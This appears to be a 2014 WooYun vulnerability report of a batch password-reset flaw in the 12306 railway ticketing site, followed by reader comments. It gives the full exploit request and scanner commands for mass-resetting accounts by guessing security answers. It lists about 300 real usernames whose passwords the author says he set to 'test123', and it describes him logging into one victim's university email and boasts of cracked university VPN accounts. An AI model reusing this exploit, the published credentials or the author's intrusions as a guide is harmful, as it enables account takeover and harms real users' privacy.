当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063813

漏洞标题:演示12306批量重置密码漏洞(可修改多个用户密码)

相关厂商:中国铁道科学研究院

漏洞作者: lijiejie

提交时间:2014-06-06 21:13

修复时间:2014-06-11 14:41

公开时间:2014-06-11 14:41

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:16

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-06: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

之前提给12306的漏洞被忽略了:http://www.wooyun.org/bugs/wooyun-2014-063025,哥还是详细演示下利用方法吧。。。

详细说明:

利用之前ping一下kyfw.12306.cn,然后修改hosts,固定解析到该IP。
POST:

POST /otn/forgetPassword/findPasswordByPromptAnswer HTTP/1.1
Host: kyfw.12306.cn
Connection: keep-alive
Content-Length: 228
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://kyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0A1E82A1441AF4843295A39FF9A11E51; BIGipServerotn=2362704138.38945.0000
userDTO.loginUserDTO.user_name=anfeng&userDTO.pwd_question=%E6%82%A8%E7%9A%84%E5%87%BA%E7%94%9F%E5%9C%B0%E6%98%AF%EF%BC%9F&userDTO.pwd_answer=%E4%B8%8A%E6%B5%B7&userDTO.password_new=test123&confirmPassWord=test123&randCodes=u6hc


其中session id和randCodes根据自己的值修改即可。
下载哥写的脚本(http://www.lijiejie.com/htpwdscan-http-weakpass-scanner/),分别执行:

htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=pinyin2.txt -err=existError\":\"Y -debug


htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=C:/cygwin/home/pinyin2.txt -err=existError\":\"Y -o=12306.txt


在12306.txt中,你可以得到密码已经被修改为test123的用户们。
上面的HTTP请求中,可以为答案设置额外的字典。

漏洞证明:

以下账号密码都被修改为test123,不信你试几个?

aidong
anfeng
banbing
bangka
baoquan
bianfang
binger
caituo
caizhi
caorun
chaifang
changyan
chaoang
chaowei
chendiu
chenning
chensi
chengna
chonglai
chuaizhuo
chuandan
conghua
cuanzheng
cuixing
cuizhou
daidong
dequan
dengyang
diexian
douniang
dugong
duangang
dunpai
fanlei
feigeng
douzhuo
gainai
gaishu
gangqin
gening
geixiao
genneng
gongnei
guainian
guaizhe
guanshuang
guangpin
nuanxiao
paizhang
pangai
panlei
pangai
pangshe
paogao
peizhi
pinsan
qianduan
qieshuang
qingneng
qiujing
quliang
quemei
quexin
qundao
ranjing
renmin
rilang
rongzhai
rouran
ruanlei
ruannan
sanshou
shaleng
shaiyan
shangdao
shangji
shaohong
shenping
shenshuo
shigun
shijia
shijing
shudun
shuxin
shuagun
shunshai
songan
suibian
sunjin
sunjing
suogua
tangxiong
tianma
tingleng
tongdian
tuibian
tuirong
waizhan
wanchen
wangrong
weinei
wenlan
xianglong
xiaofei
xiaoqin
xiaosa
xiaosong
xiechong
xinggu
xingzang
xiongfang
xiongkai
xiupao
xiuzuo
xuanli
xunxun
yajing
yanchen
yangsa
yaoyun
yilang
yinmei
youhang
yuangeng
yueyong
zancheng
zangnuo
zaoling
zhaili
zhaizang
zhaokuan
zhaoying
zhengeng
zhengjin
zhipian
zhongshui
zhubiao
zhuyuan
zhuawo
zhuaichu
zhuanghong
zongcai
zongnuo
zouying
zuzheng
zuolou
zuosha
bantan
benqiao
biaoneng
binqian
bingdui
bochui
boqing
cangjia
chajie
chaqin
chanxun
chefeng
chenyin
chengfu
chengliu
chixiang
chulia
chuping
chuzhuang
chuangchu
cichan
ciling
cuiniao
daigang
daipin
danjin
danglei
deiseng
dengfu
dengzhou
dielao
diemei
dinglin
dinglu
dingpan
dingyue
duhuai
duming
duanzhao
duotuan
enseng
fanghai
feichen
fenghong
fenglei
foguang
fufang
gennie
guasan
guaiha
guanyue
haqing
haxiao
hanchui
hanghao
hangzhen
heiqia
hentong
hongtian
houbin
hujiong
huading
huangfang
huanglei
huangli
huogong
jiping
jiareng
jiangqiang
jiaochu
jiehua
jiepan
jieying
jinpie
jinren
jingchuan
jiongbai
jiongxu
juchai
juanfang
jueruan
kanmin
kangrun
kaoshi
kaosun
kaowen
kejian
kekong
kengshen
kuaiying
kuikai
kuipin
landie
lanmie
lanseng
laomai
leiqiu
leixia
lenghai
liamin
liaqiong
lianfu
linnei
liuzhang
loujue
luqing
lushen
maigang
mehuan
meiwang
mengun
mengbai
mengda
mengren
mieduan
mindong
naidao
nanlan
nanrong
nengniu
niaorong
nieling
ningde
nongzhang
nuoliang
oushou
paiyao
pangceng
pangniang
pangwu
pishen
pinqiao
qiahua
qianshu
qiaojiong
qinxun
qingsuo
qiongfa
qiongge
qiuran
quanjiao
quepeng
quetong
qunkang
rexuan
renqian
rengren
rongxu
rouzhou
ruanmin
ruoshun
shaqing
shazhong
shanhai
shanlian
shanshuang
shanxun
shaoyin
shendian
shennan
shensuan
shengjun
shihuan
shihua
shinei
shujiu
shuaxiong
shuima
shunjing
taikui
tenggang
tengyong
tizheng
tiewang
tongnuo
tongshan
tuixiu
tuoren
waichou
wanping
weihong
weishei
wensuo
woseng
xiashun
xiannian
xiantu
xiangma
xiaoling
xieming
xingzhong
yanyin
yaosang
yingcai
yinggong
yingnong
youmei
yunniu
yunpian
zaidou
zaijiao
zaoshen
zeifang
zeishui
zenning
zhashe
zhaozhong
zhegen
zhenzen
zhibang
zhihua
zhihao
zhuzhong
zhuachen
zhuangchun
zhuangye
zongjun
zongzong
zunkun


我随便挑了个账号进去看(对天发誓,中间随便挑的),一看,居然是清华邮箱啊。 随手拿电话号登录邮箱,轻轻松松登录进入了,额。。。 鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了

12306_info.png


tsinghua_mail.png


修复方案:

你们更专业

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2014-06-09 08:24

厂商回复:

谢谢

最新状态:

2014-06-11:已经修复,多谢!

漏洞评价:

评论

  1. 2014-06-06 21:17 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  2. 2014-06-06 21:20 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    top~

  3. 2014-06-06 21:36 | 迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)

    奖励春运火车票一张

  4. 2014-06-06 21:36 | 野驴~ ( 路人 | Rank:5 漏洞数:2 | 充满强烈好奇心的菜鸟。)

    楼下如何看?

  5. 2014-06-06 21:57 | Siro ( 实习白帽子 | Rank:66 漏洞数:11 | ) <Freedom /> (Fuck)

    坐等学习思路……

  6. 2014-06-06 22:49 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    欢迎打脸。。

  7. 2014-06-06 23:47 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    楼主不拿rank不死心啊

  8. 2014-06-07 09:03 | 小杰 ( 路人 | Rank:4 漏洞数:1 | 低调的一个人)

    洞主这是作死的节奏啊,这不是给12306查水表的借口吗。

  9. 2014-06-07 11:36 | B1acken ( 普通白帽子 | Rank:174 漏洞数:56 | 渣渣)

    楼主,打人是不打脸的,低调

  10. 2014-06-11 14:56 | nony ( 路人 | Rank:28 漏洞数:13 | Not do is die...)

    楼主出门的时候 穿好防弹衣 戴好头盔神马的

  11. 2014-06-11 15:03 | 小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)

    “ 鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了” ……洞主小心水表……

  12. 2014-06-11 15:16 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    你们怎么都喜欢拿清华开刀,还把学生数据拖了好几遍,太过分了,shell都不分享

  13. 2014-06-11 15:42 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    原理是什么

  14. 2014-06-11 15:56 | 深蓝 ( 普通白帽子 | Rank:960 漏洞数:220 | 我们不是骇客,我们是黑客,我们维护互联网...)

    下次拿北大开刀

  15. 2014-06-11 16:10 | 风之传说 ( 普通白帽子 | Rank:138 漏洞数:28 | 借用朋友的一句话,你的时间在哪里,你的成...)

    good..

  16. 2014-06-11 16:25 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    不要跟12306谈安全

  17. 2014-06-11 16:48 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了

  18. 2014-06-11 21:09 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了

  19. 2014-06-12 10:44 | zhangjie ( 路人 | Rank:4 漏洞数:2 | 我什么都不知道)

    关键是这些帐号的密码还是 test123

  20. 2014-06-14 00:10 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    清华的数据库给拖了* 但是很多都不是核心的 lz进入主干的节奏?

  21. 2014-06-19 11:15 | IT偏执狂 ( 路人 | Rank:6 漏洞数:3 | 禁锢我们的究竟是什么?)

    关键是这些帐号的密码还是 test123

  22. 2014-06-19 15:07 | 西顾 ( 路人 | Rank:0 漏洞数:1 | 保守主义,展元爱好者,啥都不会)

    咚咚咚 开门 社区送温暖

  23. 2014-06-23 16:05 | 蛋碎酱油 ( 路人 | Rank:5 漏洞数:1 | http://www.metasploit.com.cn)

    学习学习

  24. 2014-06-28 08:08 | Doze ( 路人 | Rank:2 漏洞数:2 | 路人)

    test123 还可用

  25. 2014-06-28 09:40 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    @Doze 可以看出,他们并不很重视用户的信息和数据

  26. 2014-06-28 17:00 | hawkeye ( 路人 | Rank:0 漏洞数:1 | 关注安全)

    楼主 做等水表了

  27. 2014-07-01 15:04 | 芙兰朵露斯卡雷特 ( 路人 | Rank:4 漏洞数:4 | 看我闪现逃走闪现逃走六不六)

    no zuo no die why you try

  28. 2014-07-12 12:56 | StarBrilliant ( 路人 | Rank:10 漏洞数:1 | (null))

    这打码打得……肉眼都能看见啊……